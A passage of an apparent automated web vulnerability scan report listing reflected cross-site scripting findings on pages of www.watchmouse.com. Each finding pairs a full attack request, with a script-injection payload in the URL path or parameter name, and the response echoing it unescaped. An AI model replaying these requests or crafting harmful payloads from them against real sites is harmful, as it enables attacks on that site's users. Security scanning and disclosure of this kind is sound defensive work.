Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e2eab2f7ad4354f168093787bd73f4db"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enb1bb5"><script>alert(1)</script>a6b74324670/press.php" method="post">
...[SNIP]...

1.198. http://www.watchmouse.com/en/press.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/press.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9964"><script>alert(1)</script>b39620f6cf2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/press.phpa9964"><script>alert(1)</script>b39620f6cf2 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-7c4fed7fd6c164264714f6adb90eda0a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/press.phpa9964"><script>alert(1)</script>b39620f6cf2" method="post">
...[SNIP]...

1.199. http://www.watchmouse.com/en/press.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/press.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67409"><script>alert(1)</script>034afc75996 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/press.php?67409"><script>alert(1)</script>034afc75996=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:46 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-bb89ff507fa5a3cf96bf1248ac4be8f2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/press.php?67409"><script>alert(1)</script>034afc75996=1" method="post">
...[SNIP]...

1.200. http://www.watchmouse.com/en/privacy.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/privacy.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d9ae"><script>alert(1)</script>164cd255052 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en3d9ae"><script>alert(1)</script>164cd255052/privacy.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f8bc1ed8a9301bfe52aa0bd5144ea7bc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en3d9ae"><script>alert(1)</script>164cd255052/privacy.php" method="post">
...[SNIP]...

1.201. http://www.watchmouse.com/en/privacy.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/privacy.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e30e1"><script>alert(1)</script>dd0044f42cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/privacy.phpe30e1"><script>alert(1)</script>dd0044f42cc HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-1529a80f067e72d1a9430f3233968cae"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/privacy.phpe30e1"><script>alert(1)</script>dd0044f42cc" method="post">
...[SNIP]...

1.202. http://www.watchmouse.com/en/privacy.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/privacy.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35df3"><script>alert(1)</script>039787c73ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/privacy.php?35df3"><script>alert(1)</script>039787c73ab=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-049957ca75d393923b99c2fc377aa776"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/privacy.php?35df3"><script>alert(1)</script>039787c73ab=1" method="post">
...[SNIP]...

1.203. http://www.watchmouse.com/en/register.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/register.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 392fe"><script>alert(1)</script>793e583b02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en392fe"><script>alert(1)</script>793e583b02/register.php?vpackid=35 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:04:23 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-7ddd0568df3c92acdbbb09a302e819a1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en392fe"><script>alert(1)</script>793e583b02/register.php?vpackid=35" method="post">
...[SNIP]...

1.204. http://www.watchmouse.com/en/register.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/register.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f442"><script>alert(1)</script>da39ee4718 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/register.php9f442"><script>alert(1)</script>da39ee4718?vpackid=35 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:04:25 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a9d847e82e054d5be22fabf1e05b5637"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/register.php9f442"><script>alert(1)</script>da39ee4718?vpackid=35" method="post">
...[SNIP]...

1.205. http://www.watchmouse.com/en/register.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/register.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc9b5"><script>alert(1)</script>a8fde59d62a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/register.php?vpackid=35&bc9b5"><script>alert(1)</script>a8fde59d62a=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:04:20 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-2994ce7531d329ecfcd833020b1dd128"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 25757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<a href="/nl/register.php?vpackid=35&bc9b5"><script>alert(1)</script>a8fde59d62a=1" onclick="$('#lang-menu').toggle();">
...[SNIP]...

1.206. http://www.watchmouse.com/en/releases.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/releases.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26362"><script>alert(1)</script>b23c49f8722 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en26362"><script>alert(1)</script>b23c49f8722/releases.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2b60d47f944aae9ef40f67f13af9bed3"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en26362"><script>alert(1)</script>b23c49f8722/releases.php" method="post">
...[SNIP]...

1.207. http://www.watchmouse.com/en/releases.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/releases.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc683"><script>alert(1)</script>5891b6e46f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/releases.phpcc683"><script>alert(1)</script>5891b6e46f7 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b158e131da7dfbd7cd7be82632b0587b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/releases.phpcc683"><script>alert(1)</script>5891b6e46f7" method="post">
...[SNIP]...

1.208. http://www.watchmouse.com/en/releases.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/releases.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaf7b"><script>alert(1)</script>fb12fa7fde0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/releases.php?aaf7b"><script>alert(1)</script>fb12fa7fde0=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d89a9dbd067fe5768f6c6582caba5fdb"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/releases.php?aaf7b"><script>alert(1)</script>fb12fa7fde0=1" method="post">
...[SNIP]...

1.209. http://www.watchmouse.com/en/resellers.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/resellers.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2814"><script>alert(1)</script>b5997cf7315 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enf2814"><script>alert(1)</script>b5997cf7315/resellers.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-aba9c415162a352a3b21ff756db1d8ea"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enf2814"><script>alert(1)</script>b5997cf7315/resellers.php" method="post">
...[SNIP]...

1.210. http://www.watchmouse.com/en/resellers.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/resellers.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b6dd"><script>alert(1)</script>eaec2988e25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/resellers.php7b6dd"><script>alert(1)</script>eaec2988e25 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:15 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-36d0961770f9c95f3a51c96e1ca5616a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/resellers.php7b6dd"><script>alert(1)</script>eaec2988e25" method="post">
...[SNIP]...

1.211. http://www.watchmouse.com/en/resellers.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/resellers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33a7d"><script>alert(1)</script>1799e2b91de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

